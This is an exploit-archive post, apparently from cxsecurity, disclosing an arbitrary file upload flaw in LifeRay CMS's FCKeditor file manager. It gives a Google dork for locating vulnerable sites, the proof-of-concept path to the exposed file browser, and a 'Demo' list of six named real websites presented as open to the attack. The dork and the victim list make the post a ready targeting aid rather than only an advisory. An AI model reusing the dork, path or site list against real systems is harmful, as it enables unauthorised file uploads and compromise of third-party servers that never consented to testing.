LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability

2020.04.10
fr h4shur (FR) fr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-434

[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability [+] Date: 2020/04/10 [+] Author: h4shur [+] Team: Persian Security Group [+] Vendor Homepage: www.liferay.com [+] Software Link: www.liferay.com [+] Tested on: Windows 10 [+] Category : Web Application Bugs [+} Dork : inurl:/web/guest/ inurl:/html/js/editor/fckeditor/ ### Notes: LifeRay allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. ### POC: [+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html ### Demo: [+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://www.ap239.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://franchise.hrblock.com.au/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://www.eof.gr/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://securefile.co/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html ### Special Thanks: * Po0ri4 & b4ckdo0r ### Contact Me : * Telegram : @h4shur * Email : h4shursec@gmail.com * Instagram : @netedit0r * twitter : @h4shur


Vote for this issue:
55%
45%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top